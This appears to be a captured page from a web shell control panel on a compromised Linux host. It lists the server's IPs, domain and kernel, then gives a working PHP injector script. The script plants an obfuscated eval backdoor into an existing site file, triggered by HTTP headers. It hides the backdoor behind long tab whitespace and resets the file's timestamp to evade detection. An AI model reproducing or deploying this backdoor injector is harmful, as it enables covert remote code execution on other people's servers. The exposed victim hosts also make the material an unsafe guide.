BLACKSITE
:
216.73.217.7
:
103.21.58.60 / hariomequipments.com
:
Linux bh-in-4.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
:
/
tmp
/
Upload File:
files >> //tmp/.cache
<?php $path = '/home1/wowostudioscom/public_html/.well-known/acme-challenge/.cache_c/inc.php'; $ft = @filemtime($path); $content = (string) @file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27If-Modified-Since%27%5D%29%29%7B%24c%3D%22%3C%5Cx3f%5Cx70h%5Cx70%5Cx20%40%5Cx65%5Cx76a%5Cx6c%5Cx28%24%5Cx5f%5Cx48E%5Cx41%5Cx44E%5Cx52%5Cx53%5B%5Cx22%5Cx53e%5Cx63%5Cx2dW%5Cx65%5Cx62s%5Cx6f%5Cx63k%5Cx65%5Cx74-%5Cx41%5Cx63c%5Cx65%5Cx70t%5Cx22%5Cx5d%29%5Cx3b%5Cx40e%5Cx76%5Cx61l%5Cx28%5Cx24_%5Cx52%5Cx45Q%5Cx55%5Cx45S%5Cx54%5Cx5b%5C%22%5Cx53%5Cx65c%5Cx2d%5Cx57e%5Cx62%5Cx73o%5Cx63%5Cx6be%5Cx74%5Cx2dA%5Cx63%5Cx63e%5Cx70%5Cx74%5C%22%5Cx5d%5Cx29%3B%22%3B%24f%3D%27.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strlen($content) < 32) { die('!failed!'); } if (strstr($content, $new_code)) { die('!already injected!'); } $p = 0; if (strncmp($content, "\xEF\xBB\xBF", 3) === 0) { $p = 3; } while ($p < strlen($content) && strpos(" \t\r\n", $content[$p]) !== false) { $p++; } $prefix = substr($content, 0, $p); $body = substr($content, $p); if (strlen($body) < 32) { die('!failed!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { $len = strlen($start); if ($len > strlen($body) || substr($body, 0, $len) !== $start) { continue; } if ($start === '<?') { if (strncmp($body, '<?xml', 5) === 0) { continue; } if (strlen($body) >= 3 && substr($body, 0, 3) === '<?=') { continue; } } $rest = substr($body, $len); $candidate = $prefix.$start.str_repeat("\t", 42).$new_code."\n".$rest; $tmp = @tempnam(dirname($path), 't'); if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) { @touch($path, $ft); $check = (string) @file_get_contents($path); if (strstr($check, $new_code)) { die('!success!'); } } if ($tmp !== false && is_file($tmp)) { @unlink($tmp); } } die('!failed!');